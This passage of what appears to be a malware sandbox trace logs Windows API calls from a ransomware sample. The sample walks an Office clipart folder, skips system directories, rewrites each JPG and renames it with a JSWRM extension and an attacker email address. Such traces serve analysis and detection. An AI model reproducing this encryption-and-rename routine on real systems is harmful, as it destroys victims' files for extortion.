| out: lpMultiByteStr="J0313970.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0089.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0089.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0089.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0089.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313970.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313970.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.386] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=33195) returned 1 [0089.386] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x81a0) returned 0x24d210 [0089.387] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x81a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x81a0, lpOverlapped=0x0) returned 1 [0089.390] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.391] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x81a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x81a0, lpOverlapped=0x0) returned 1 [0089.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.391] CloseHandle (hObject=0x314) returned 1 [0089.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0089.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0089.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0089.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0089.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0089.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0089.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0089.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0089.442] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313970.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313970.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313970.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313970.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0089.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0089.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0089.444] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42d018, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf42d018, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf42d018, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb9d1, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0313974.JPG", cAlternateFileName="")) returned 1 [0089.444] lstrcmpiW (lpString1="J0313974.JPG", lpString2=".") returned 1 [0089.444] lstrcmpiW (lpString1="J0313974.JPG", lpString2="..") returned 1 [0089.444] lstrcmpiW (lpString1="J0313974.JPG", lpString2="...") returned 1 [0089.444] lstrcmpiW (lpString1="J0313974.JPG", lpString2="windows") returned -1 [0089.444] lstrcmpiW (lpString1="J0313974.JPG", lpString2="recovery") returned -1 [0089.444] lstrcmpiW (lpString1="J0313974.JPG", lpString2="perflogs") returned -1 [0089.444] lstrcmpiW (lpString1="J0313974.JPG", lpString2="documents and settings") returned 1 [0089.444] lstrcmpiW (lpString1="J0313974.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.444] lstrcmpiW (lpString1="J0313974.JPG", lpString2="system volume information") returned -1 [0089.444] lstrcmpiW (lpString1="J0313974.JPG", lpString2="msocache") returned -1 [0089.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0089.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0313974.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0313974.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0313974.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0089.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0089.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0313974.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0313974.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0313974.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0089.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0089.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0089.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0089.445] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313974.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313974.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.446] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=47569) returned 1 [0089.446] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb9d0) returned 0x24d210 [0089.447] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xb9d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xb9d0, lpOverlapped=0x0) returned 1 [0089.451] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.451] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xb9d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xb9d0, lpOverlapped=0x0) returned 1 [0089.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.453] CloseHandle (hObject=0x314) returned 1 [0089.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0089.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0089.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0089.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0089.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0089.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0089.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.453] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313974.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313974.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313974.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313974.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0089.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0089.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0089.454] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42d018, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf42d018, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf42d018, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x40f2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0314068.JPG", cAlternateFileName="")) returned 1 [0089.454] lstrcmpiW (lpString1="J0314068.JPG", lpString2=".") returned 1 [0089.454] lstrcmpiW (lpString1="J0314068.JPG", lpString2="..") returned 1 [0089.454] lstrcmpiW (lpString1="J0314068.JPG", lpString2="...") returned 1 [0089.454] lstrcmpiW (lpString1="J0314068.JPG", lpString2="windows") returned -1 [0089.454] lstrcmpiW (lpString1="J0314068.JPG", lpString2="recovery") returned -1 [0089.454] lstrcmpiW (lpString1="J0314068.JPG", lpString2="perflogs") returned -1 [0089.454] lstrcmpiW (lpString1="J0314068.JPG", lpString2="documents and settings") returned 1 [0089.454] lstrcmpiW (lpString1="J0314068.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.454] lstrcmpiW (lpString1="J0314068.JPG", lpString2="system volume information") returned -1 [0089.454] lstrcmpiW (lpString1="J0314068.JPG", lpString2="msocache") returned -1 [0089.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0089.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0314068.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0314068.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0314068.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0089.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0089.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0314068.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0314068.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0314068.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0089.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0089.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0089.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0089.455] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0314068.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0314068.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.455] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16626) returned 1 [0089.455] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40f0) returned 0x24d210 [0089.456] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x40f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x40f0, lpOverlapped=0x0) returned 1 [0089.459] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.459] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x40f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x40f0, lpOverlapped=0x0) returned 1 [0089.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.459] CloseHandle (hObject=0x314) returned 1 [0089.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0089.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0089.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0089.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0089.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0089.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0089.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0089.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0089.459] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0314068.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0314068.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0314068.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0314068.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0089.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0089.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0089.460] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42d018, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf42d018, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf42d018, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4b02, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0315580.JPG", cAlternateFileName="")) returned 1 [0089.460] lstrcmpiW (lpString1="J0315580.JPG", lpString2=".") returned 1 [0089.460] lstrcmpiW (lpString1="J0315580.JPG", lpString2="..") returned 1 [0089.460] lstrcmpiW (lpString1="J0315580.JPG", lpString2="...") returned 1 [0089.460] lstrcmpiW (lpString1="J0315580.JPG", lpString2="windows") returned -1 [0089.461] lstrcmpiW (lpString1="J0315580.JPG", lpString2="recovery") returned -1 [0089.461] lstrcmpiW (lpString1="J0315580.JPG", lpString2="perflogs") returned -1 [0089.461] lstrcmpiW (lpString1="J0315580.JPG", lpString2="documents and settings") returned 1 [0089.461] lstrcmpiW (lpString1="J0315580.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.461] lstrcmpiW (lpString1="J0315580.JPG", lpString2="system volume information") returned -1 [0089.461] lstrcmpiW (lpString1="J0315580.JPG", lpString2="msocache") returned -1 [0089.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0089.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0315580.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0315580.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0315580.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0089.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0089.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0315580.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0315580.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0315580.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0089.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0089.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0089.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0089.461] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0315580.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0315580.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.461] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19202) returned 1 [0089.462] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4b00) returned 0x24d210 [0089.462] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4b00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4b00, lpOverlapped=0x0) returned 1 [0089.464] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.464] WriteFile (in: 